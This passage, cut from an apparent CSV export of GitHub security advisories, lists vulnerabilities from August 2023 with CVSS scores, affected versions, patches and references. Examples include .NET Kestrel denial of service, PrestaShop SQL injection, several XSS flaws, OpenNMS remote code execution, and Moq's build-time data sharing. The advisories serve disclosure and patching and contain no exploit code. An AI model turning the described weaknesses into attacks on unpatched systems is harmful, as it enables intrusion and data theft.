'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@node-saml/node-saml'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/node-saml/node-saml/security/advisories/GHSA-vx8m-6fhw-pccw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40178'}, {'type': 'WEB', 'url': 'https://github.com/node-saml/node-saml/commit/045e3b9c54211fdb95f96edf363679845b195cec'}, {'type': 'PACKAGE', 'url': 'https://github.com/node-saml/node-saml'}, {'type': 'WEB', 'url': 'https://github.com/node-saml/node-saml/releases/tag/v4.0.5'}]","{'cwe_ids': ['CWE-347', 'CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:13:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-vmch-3w2x-vhgq,2023-08-09T12:56:43Z,2023-08-09T12:56:43Z,,['CVE-2023-38180'],.NET Denial of Service Vulnerability,"# Microsoft Security Advisory CVE-2023-38180: .NET Denial of Service Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 2.1, .NET 6.0, and .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in Kestrel where, on detecting a potentially malicious client, Kestrel will sometimes fail to disconnect it, resulting in denial of service. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/269 ### Mitigation factors If your application is running behind a reverse proxy, or Web Application Firewall, which has its own mitigations against HTTP based attacks this issue may be mitigated by the proxy or WAF ## Affected software * Any .NET 7.0 application running on .NET 7.0.8 or earlier. * Any .NET 6.0 application running on .NET 6.0.19 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv) | >= 6.0.0, <= 6.0.20 | 6.0.21 [Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.20 | 6.0.21 [Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.20 | 6.0.21 [Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.20 | 6.0.21 ### ASP.NET Core 2.1 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv) | <= 2.1.39 | 2.1.40 [Microsoft.AspNetCore.Server.Kestrel.Transport.Sockets](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.Kestrel.Transport.Sockets) | <= 2.1.39 | 2.1.40 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-38180]( https://www.cve.org/CVERecord?id=CVE-2023-38180) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Server.Kestrel.Transport.Libuv'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.39'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Server.Kestrel.Transport.Sockets'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.39'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-vmch-3w2x-vhgq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38180'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/issues/90170'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CL2L4WE5QRT7WEXANYXSKSU43APC5N2V/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWVZFKTLNMNKPZ755EMRYIA6GHFOWGKY/'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38180'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T12:56:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-443m-3fr6-w8wj,2023-08-23T20:06:51Z,2023-08-17T21:30:53Z,,['CVE-2023-36106'],PowerJob incorrect access control vulnerability,An incorrect access control vulnerability in powerjob 4.3.2 and earlier allows remote attackers to obtain sensitive information via the interface for querying via `appId` parameter to `/container/list`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'tech.powerjob:powerjob'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36106'}, {'type': 'WEB', 'url': 'https://gist.github.com/tztdsb/a653b6db328199ec0f55e54b4e466415#file-gistfile1-txt'}, {'type': 'PACKAGE', 'url': 'https://gitee.com/KFCFans/PowerJob'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:51:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-75p5-jwx4-qw9h,2023-08-09T14:34:42Z,2023-08-09T14:34:42Z,,['CVE-2023-39524'],PrestaShop boolean SQL injection,"### Impact SQL injection possible in product search field, in BO's product page ### Patches 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds none ### References none ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-75p5-jwx4-qw9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39524'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/2047d4c053043102bc46a37d383b392704bf14d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:34:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-3fqw-j7x8-g75j,2023-08-16T21:11:04Z,2023-08-16T15:30:18Z,,['CVE-2023-40344'],Jenkins Delphix Plugin missing permission check,"Jenkins Delphix Plugin 3.0.2 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability. An enumeration of credentials IDs in Delphix Plugin 3.0.3 requires the appropriate permissions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:delphix'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40344'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3214%20(1)'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:11:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-c8xw-vjgf-94hr,2023-08-31T00:03:04Z,2023-08-23T17:50:41Z,,['CVE-2023-40025'],Argo CD web terminal session doesn't expire,"### Impact All versions of Argo CD starting from v2.6.0 have a bug where open web terminal sessions do not expire. This bug allows users to send any websocket messages even if the token has already expired. The most straightforward scenario is when a user opens the terminal view and leaves it open for an extended period. This allows the user to view sensitive information even when they should have been logged out already. ### Patches A patch for this vulnerability has been released in the following Argo CD version: * v2.6.14 * v2.7.12 * v2.8.1 ### Workarounds The only way to completely resolve the issue is to upgrade. #### Mitigations Disable web-based terminal or define RBAC rules to it [https://argo-cd.readthedocs.io/en/latest/operator-manual/web_based_terminal/](https://argo-cd.readthedocs.io/en/latest/operator-manual/web_based_terminal/) ### For more information If you have any questions or comments about this advisory: * Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) * Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd ### Credits Thank you to bean.zhang (@zhlu32 ) of HIT-IDS ChunkL Team who discovered the issue and reported it confidentially according to our [guidelines](https://github.com/argoproj/argo-cd/blob/master/SECURITY.md#reporting-a-vulnerability).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.1'}]}], 'versions': ['2.8.0']}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-c8xw-vjgf-94hr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40025'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/e047efa8f9518c54d00d2e4493b64bc4dba98478'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T17:50:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-6r78-m64m-qwcf,2023-08-25T18:58:25Z,2023-08-10T19:25:23Z,,[],Moq v4.20.0-rc to 4.20.1 share hashed user data,"Moq v4.20.0-rc to 4.20.1 include support for [SponsorLink](https://github.com/devlooped/SponsorLink), which runs an obfuscated DLL at build time that scans local `git config` data and shares the user's hashed email address with SponsorLink's remote servers. There is no option to disable this. Moq v4.20.2 has removed this functionality.",[],"[{'package': {'ecosystem': 'NuGet', 'name': 'moq'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.20.0-rc'}, {'fixed': '4.20.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/moq/moq/issues/1374'}, {'type': 'WEB', 'url': 'https://github.com/moq/moq/pull/1363'}, {'type': 'WEB', 'url': 'https://github.com/moq/moq/pull/1375'}, {'type': 'PACKAGE', 'url': 'https://github.com/moq/moq'}, {'type': 'WEB', 'url': 'https://www.cazzulino.com/sponsorlink.html'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-10T19:25:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-jrj6-qx48-3cpq,2023-08-18T14:29:06Z,2023-08-16T15:30:18Z,,['CVE-2023-40351'],Jenkins Favorite View Plugin cross-site request forgery vulnerability,"Jenkins Favorite View Plugin 5.v77a_37f62782d and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to add or remove views from another user’s favorite views tab bar. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:favorite-view'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.v77a'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40351'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3201'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:04:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-8m9p-3926-gffr,2023-08-17T19:08:16Z,2023-08-08T18:30:35Z,,['CVE-2023-38758'],wger Workout Manager Cross-site Scripting vulnerability,"Cross Site Scripting vulnerability in wger Project wger Workout Manager v.2.2.0a3 allows a remote attacker to gain privileges via the `license_author `field in the add-ingredient function in the `templates/ingredients/view.html`, `models/ingredients.py`, and `views/ingredients.py` components.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wger'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0a3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38758'}, {'type': 'WEB', 'url': 'https://github.com/0x72303074/CVE-Disclosures'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/wger/PYSEC-2023-143.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/wger-project/wger'}, {'type': 'WEB', 'url': 'https://wger.de'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-17T19:08:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-5cv4-48h7-7782,2023-08-17T19:06:36Z,2023-08-17T06:30:13Z,,['CVE-2023-4395'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit 2.6.3 and prior. A patch is available at commit 36d1d4d256cbbab028342ba10cc493e5c119172c and anticipated to be part of version 2.6.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4395'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/36d1d4d256cbbab028342ba10cc493e5c119172c'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/60e38563-7ac8-4a13-ac04-2980cc48b0da'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-17T19:06:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-v7v8-gjv7-ffmr,2023-08-16T21:00:33Z,2023-08-16T21:00:33Z,,['CVE-2023-26140'],@excalidraw/excalidraw Cross-site Scripting vulnerability,"### Impact XSS vulnerability due to improperly sanitizing URLs of links that can be attached on canvas elements. This affects users of the npm package `@excalidraw/excalidraw` provided it was deployed in environments where untrusted user input in drawings that are then shared with third parties is a concern. If you only hosted the editor in trusted environments, or sharing didn't take place, the impact is minimized. ### Patches Patch is available on version 0.15.3 and up (stable), or latest `@excalidraw/excalidraw@next` (unstable releases). ### Workarounds No workaround without upgrading unless deployed in environments without untrusted user input. ### References https://security.snyk.io/vuln/SNYK-JS-EXCALIDRAWEXCALIDRAW-5841658 https://github.com/excalidraw/excalidraw/pull/6728","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@excalidraw/excalidraw'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/excalidraw/excalidraw/security/advisories/GHSA-v7v8-gjv7-ffmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26140'}, {'type': 'WEB', 'url': 'https://github.com/excalidraw/excalidraw/pull/6728'}, {'type': 'WEB', 'url': 'https://github.com/excalidraw/excalidraw/commit/b33fa6d6f64d27adc3a47b25c0aa55711740d0af'}, {'type': 'PACKAGE', 'url': 'https://github.com/excalidraw/excalidraw'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-EXCALIDRAWEXCALIDRAW-5841658'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:00:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-j5g3-5c8r-7qfx,2023-08-30T21:24:57Z,2023-08-30T21:24:57Z,,[],Prevent logging invalid header values,"## Impact ### What kind of vulnerability is it? Apollo Server can log sensitive information (Studio API keys) if they are passed incorrectly (with leading/trailing whitespace) or if they have any characters that are invalid as part of a header value. ### Who is impacted? Users who (all of the below): * use either the schema reporting or usage reporting feature * use an Apollo Studio API key which has invalid header values * use the default fetcher (`node-fetch`) or configured their own `node-fetch` fetcher The following node snippet can test whether your API key has invalid header values. This code is taken directly from `node-fetch@2`'s header value validation code. ```js const invalidHeaderCharRegex = /[^\t\x20-\x7e\x80-\xff]/; if (invalidHeaderCharRegex.test('')) { console.log('potentially affected'); } console.log('unaffected'); ``` If the provided API key is not a valid header value, whenever Apollo Server uses that API key in a request (to Studio, for example), `node-fetch` will throw an error _which contains the header value_. This error is logged in various ways depending on the user's configuration, but most likely the console or some configured logging service. ### Patches This problem is patched in the latest version of Apollo Server as soon as this advisory is published. ### Workarounds * Try retrieving a new API key from Studio. Note: this may not work if the invalid character is not part of the secret (it may be derived from identifiers like graph name, user name). * Override the `fetcher` * Disable schema reporting and/or usage reporting ### Solution * Apollo Server will now call `.trim()` on incoming API keys in order to eliminate leading/trailing whitespace and log a warning when it does so. * Apollo Server will now perform the same validation of API keys as `node-fetch@2` performs on header values on startup. Apollo Server will throw an error on startup (i.e., fail to start completely) and notify the user their API key is invalid along with the offending characters.",[],"[{'package': {'ecosystem': 'npm', 'name': '@apollo/server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'apollo-server-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.12.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'apollo-server-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.26.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/security/advisories/GHSA-j5g3-5c8r-7qfx'}, {'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/commit/2c8106c433c4add4b43e2e2b2f5c5c4887b17314'}, {'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/commit/d38b43bac88acdef4295759d7dcc3d4c348d9575'}, {'type': 'PACKAGE', 'url': 'https://github.com/apollographql/apollo-server'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T21:24:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-m6pf-cm3f-7876,2023-08-15T20:03:24Z,2023-08-15T03:31:32Z,,['CVE-2023-4347'],LibreNMS Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms 23.7.0 and prior. A patch is available at commit 91c57a1ee54631e071b6b0c952d99c8ee892e824 and anticiapted to be part of version 23.8.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.8.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 23.7.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4347'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/commit/91c57a1ee54631e071b6b0c952d99c8ee892e824'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:03:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-5m5f-qg8r-p9qf,2023-08-18T21:51:39Z,2023-08-17T21:30:53Z,,['CVE-2023-40313'],OpenNMS vulnerable to remote code execution,"A BeanShell interpreter in remote server mode runs in OpenNMS Horizon versions earlier than 32.0.2 and in related Meridian versions which could allow arbitrary remote Java code execution. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-base-assembly'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': 